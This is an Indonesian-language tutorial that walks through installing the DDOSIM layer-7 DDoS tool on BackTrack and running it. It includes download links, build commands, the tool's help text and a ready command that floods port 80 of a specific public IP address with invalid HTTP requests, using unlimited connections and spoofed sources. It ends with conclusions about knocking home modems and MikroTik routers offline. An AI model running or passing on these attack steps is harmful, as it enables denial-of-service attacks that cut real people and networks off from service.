DDOSIM, DDOS layer 7

sebelumnya libnet0-dev harus terinstall, untuk yang belum punya libnet0-dev:

root@bt:~# apt-get install libnet0-dev

kalo tidak tersedia, silahkan download yang ini dan install manual :

http://kambing.ui.ac.id/ubuntu/pool/main/libp/libpcap/libpcap0.8-dev_1.0.0-1_i386.deb
http://kambing.ui.ac.id/ubuntu/pool/universe/libn/libnet0/libnet0_1.0.2a-7_i386.deb
http://kambing.ui.ac.id/ubuntu/pool/universe/libn/libnet0/libnet0-dev_1.0.2a-7_i386.deb

download ddosim

http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz/download

lalu install :

root@bt:~/ddosim# ./configure
root@bt:~/ddosim# make
root@bt:~/ddosim# make install

petunjuk penggunaan

root@bt:~# ddosim -h

# DDOSIM:  Layer 7 DDoS Simulator v0.2
# Author:  Adrian Furtuna  

Usage: ddosim
                 -d IP    Target IP address
                 -p PORT   Target port
                [-k NET]   Source IP from class C network (ex. 10.4.4.0)
                [-i IFNAME]   Output interface name
                [-c COUNT]   Number of connections to establish
                [-w DELAY]   Delay (in milliseconds) between SYN packets
                [-r TYPE]   Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
                [-t NRTHREADS]   Number of threads to use when sending packets (default 1)
                [-n]   Do not spoof source address (use local address)
                [-v]   Verbose mode (slower)
                [-h]   Print this help message

contoh untuk ddos port 80 dengan type http_invalid dan serangan count 0 (atau unlimited) dan thread serangan 3

root@bt:~# ddosim -d 110.139.19.196 -p 80 -r HTTP_INVALID -c 0 -t 3

kesimpulan:
- DDOS modem speedy dengan type serangan http_invalid hanya butuh koneksi 10KBps
- DDOS mikrotik (kemungkinan besar RB) dengan koneksi mikrotik tsb dibawah koneksi si attacker, mengabitkan DROP connection